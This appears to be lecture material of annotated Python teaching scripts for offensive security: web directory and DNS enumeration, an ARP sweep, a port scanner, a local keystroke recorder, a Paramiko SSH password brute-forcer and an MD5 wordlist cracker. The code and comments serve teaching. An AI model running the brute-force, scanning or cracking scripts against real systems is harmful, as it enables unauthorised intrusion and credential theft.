
Lecture 9 Python Script

The first script enumerates directories on a web server by checking HTTP response codes for specific URLs. The second uses a port scanner to probe a target IP for open ports within a specified range. The third uses Paramiko to perform an SSH brute-force attack by attempting to connect with a username and a list of passwords.

Uploaded by

Max Riddle

Python script that performs directory enumeration on a web server using a wordlist


import requests
import sys
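# Directory enumeration: request http://<host>/<word>.html for every word in
# wordlist.txt and print each URL whose response is not a 404.
# The host comes from the first command-line argument.
with open("wordlist.txt") as wordlist_file:
    # The context manager closes the file; the original left the handle open.
    directories = wordlist_file.read().splitlines()

# "entry" instead of "dir", which shadowed the builtin of the same name.
for entry in directories:
    dir_enum = f"http://{sys.argv[1]}/{entry}.html"
    try:
        # Without a timeout a single unresponsive server blocks the run forever.
        r = requests.get(dir_enum, timeout=5)
    except requests.RequestException as err:
        print("Request failed:", dir_enum, err)
        continue
    # Everything except 404 is printed, so 403, 500 and followed redirects are
    # listed as well, and a server that answers 200 for missing pages makes
    # every word look valid. The output over-reports; it is not proof that a
    # page exists.
    if r.status_code != 404:
        print("Valid directory:", dir_enum)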

Script that attempts to enumerate subdomains by resolving DNS records and then checks whether these subdomains are accessible over HTTP.
import dns.resolver
import sys
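def enumerate_subdomains(base_domain):
    """Resolve the A records of ``base_domain`` and return their addresses.

    Despite the name, no subdomain names are generated or looked up here: the
    only query is an A lookup for ``base_domain`` itself, so the result is the
    list of IPv4 addresses that this one name resolves to.

    Args:
        base_domain: DNS name to resolve.

    Returns:
        A list of address strings; empty (after printing a message) when the
        name does not exist or has no A record.
    """
    subdomains = []
    try:
        answers = dns.resolver.resolve(base_domain, 'A')
        for rdata in answers:
            # A records expose ``address``. ``target`` exists only on record
            # types that point at another name (CNAME, NS, SRV), so the
            # original attribute access raised AttributeError on every answer.
            subdomains.append(str(rdata.address))
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
        # NoAnswer: the name exists but carries no A record.
        print(f"No DNS record found for {base_domain}")
    return subdomains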

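# Command-line entry point: exactly one argument, the base domain.
if len(sys.argv) != 2:
    print("Usage: python script.py <base_domain>")
    sys.exit(1)

base_domain = sys.argv[1]
subdomains = enumerate_subdomains(base_domain)

# NOTE(review): this listing's own import lines name only dns.resolver and
# sys; `requests` has to be imported as well for this loop to run on its own.
for sub in subdomains:
    sub_domain = f"http://{sub}"
    try:
        # A timeout keeps one silent host from stalling the whole loop.
        response = requests.get(sub_domain, timeout=5)
    except requests.RequestException:
        # Unreachable or timed-out hosts are skipped, as the original did for
        # ConnectionError.
        continue
    # Only an exact 200 counts; redirects that end elsewhere and
    # authentication prompts (401/403) are not reported.
    if response.status_code == 200:
        print("Valid domain:", sub_domain)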

Script that enumerates directories by checking whether specific URLs are valid, based on the HTTP response code
import requests
import sys

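def enumerate_directories(base_url, directory_list):
    """Return the URLs under ``base_url`` that do not answer with HTTP 404.

    For each entry in ``directory_list`` the URL ``<base_url>/<entry>.html`` is
    requested with GET. Any status other than 404 counts as a hit, so 403, 500
    and followed redirects are included, and a server that returns 200 for
    missing pages makes every entry look valid.

    Args:
        base_url: Scheme and host (optionally with a path prefix). A trailing
            slash is ignored so the built URL has no doubled "/".
        directory_list: Iterable of names to try, without the ".html" suffix.

    Returns:
        List of the full URLs whose response status was not 404, in input
        order.

    Raises:
        requests.RequestException: if a request fails or times out.
    """
    # Normalise once, outside the loop; "http://host/" + "/x.html" would
    # otherwise produce "http://host//x.html".
    root = base_url.rstrip("/")
    valid_directories = []

    for directory in directory_list:
        dir_url = f"{root}/{directory}.html"
        # Without a timeout a single unresponsive server blocks forever.
        response = requests.get(dir_url, timeout=5)

        if response.status_code != 404:
            valid_directories.append(dir_url)

    return valid_directories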

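# Command-line entry point: exactly one argument, the base URL.
if len(sys.argv) != 2:
    print("Usage: python script.py <base_url>")
    sys.exit(1)

base_url = sys.argv[1]

# Read the wordlist inside a context manager so the handle is closed; the
# original open(...).read() left it to the garbage collector.
with open("wordlist.txt") as wordlist_file:
    directory_list = wordlist_file.read().splitlines()
valid_directories = enumerate_directories(base_url, directory_list)

for valid_dir in valid_directories:
    print("Valid directory:", valid_dir)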

Script that uses Scapy to perform an ARP scan within a specified IP range


from scapy.all import *

# ARP sweep of one subnet: broadcast an ARP request for every address in
# ip_range on the given interface and print "MAC - IP" for each reply.
interface = "eth0"
ip_range = "10.10.X.X/24"  # placeholder as given on the page, not a usable range
broadcastMac = "ff:ff:ff:ff:ff:ff"

# Ethernet frame addressed to the broadcast MAC, carrying the ARP request.
arp_layer = ARP(pdst=ip_range)
ether_layer = Ether(dst=broadcastMac)
packet = ether_layer / arp_layer

# srp() sends and receives at layer 2. It returns the answered
# (sent, received) pairs and the requests that got no reply within the
# 2-second timeout; inter=0.1 spaces the transmissions 0.1 s apart.
# ARP is not routed, so only hosts on the same broadcast domain as the
# interface can answer, and the sweep appears on that segment as a run of
# who-has requests from a single source MAC.
ans, unans = srp(packet, timeout=2, iface=interface, inter=0.1)

for _sent, reply in ans:
    print(reply.sprintf(r"%Ether.src% - %ARP.psrc%"))

Port Scanner
import sys
import socket
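def probeport(ip, port, result = 1):
    """Attempt a TCP connection to ``ip:port`` and report whether it succeeded.

    A full TCP connect is made (0.5 s timeout) and closed again right away, so
    the probed service sees a completed connection.

    Args:
        ip: Host passed to ``connect_ex``.
        port: TCP port number.
        result: Value returned when the connection does not succeed
            (default 1).

    Returns:
        0 when ``connect_ex`` reports success, otherwise ``result``. Errors
        raised while creating or connecting the socket are swallowed and also
        yield ``result``.
    """
    try:
        # The context manager closes the socket on every path; the original
        # skipped close() whenever settimeout/connect_ex raised.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(0.5)
            if sock.connect_ex((ip, port)) == 0:
                result = 0
    except Exception:
        # Best-effort probe: any failure counts as "not open".
        pass
    return result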

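# Scan settings. In the original listing these assignments came after the
# loop that reads them, so the script stopped with NameError before probing.
ip = '192.168.1.6'
open_ports = []

# The page first assigns range(1, 65535) (which stops at 65534) and then
# replaces it with this set, so only these eight ports are probed.
ports = {137, 139, 23, 53, 80, 135, 443, 445}

for port in ports:
    sys.stdout.flush()
    # The function defined in this listing is probeport(); the original call
    # used the undefined name probe_port.
    response = probeport(ip, port)
    if response == 0:
        open_ports.append(port)

if open_ports:
    print ("Open Ports are: ")
    print (sorted(open_ports))
else:
    print ("Looks like no ports are open :(")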

Key Logger
import keyboard
# Capture keyboard events until Enter is pressed, then replay them as
# synthetic keystrokes. Despite the "Key Logger" heading, nothing is written
# to disk or sent anywhere: the events exist only in this process.
recorded_events = keyboard.record(until ='ENTER')
keyboard.play(recorded_events)

Script to brute-force an SSH server login using the Paramiko library in Python


import paramiko

# Interactive parameters, kept as module-level names that ssh_connect() and
# the wordlist loop read. input() already returns str, so no conversion is
# needed.
target = input('Please enter target IP address: ')
username = input('Please enter username to bruteforce: ')
password_file = input('Please enter location of the password file: ')

def ssh_connect(password):
    """Try one password for the module-level ``username`` on ``target``, port 22.

    Returns True when authentication succeeds, False when the server rejects
    the password, and None (after printing the error) for any other failure
    such as a refused connection. The client is closed in every case.

    Each call is a new connection carrying a single authentication attempt,
    so on the server a run typically shows up as a series of failed password
    logins for one account from one source address.
    """
    client = paramiko.SSHClient()
    # AutoAddPolicy accepts whatever host key the server presents, so the
    # server's identity is not verified.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    outcome = None
    try:
        client.connect(target, port=22, username=username, password=password)
        print('Password found: ' + password)
        outcome = True
    except paramiko.AuthenticationException:
        print('Incorrect password: ' + password)
        outcome = False
    except Exception as e:
        # Anything other than an authentication failure: report it and leave
        # the outcome as None.
        print(e)
    finally:
        client.close()
    return outcome

# Pass each line of the wordlist to ssh_connect() in file order and exit with
# status 0 at the first one that authenticates.
with open(password_file, 'r') as wordlist:
    for raw_line in wordlist.readlines():
        # Surrounding whitespace, including the newline, is stripped first.
        if ssh_connect(raw_line.strip()):
            exit(0)

# Reached only when no line authenticated.
print('Password not found in the provided wordlist.')

Script to crack an MD5 hash using a wordlist


import hashlib

# Dictionary check of a single MD5 digest: hash every wordlist line and
# compare it with the digest entered by the user.
wordlist_location = input('Enter wordlist file location: ')
hash_input = input('Enter hash to be cracked: ')

with open(wordlist_location, 'r') as wordlist:
    for raw_line in wordlist.readlines():
        candidate = raw_line.strip()
        # One unsalted MD5 per guess is all the work required, which is why
        # fast unsalted digests are a poor choice for storing passwords.
        digest = hashlib.md5(candidate.encode()).hexdigest()
        # Exact string comparison: hexdigest() is lower-case hex.
        if digest == hash_input:
            print('Found cleartext password! ' + candidate)
            exit(0)
# The script ends without output when no line matches.
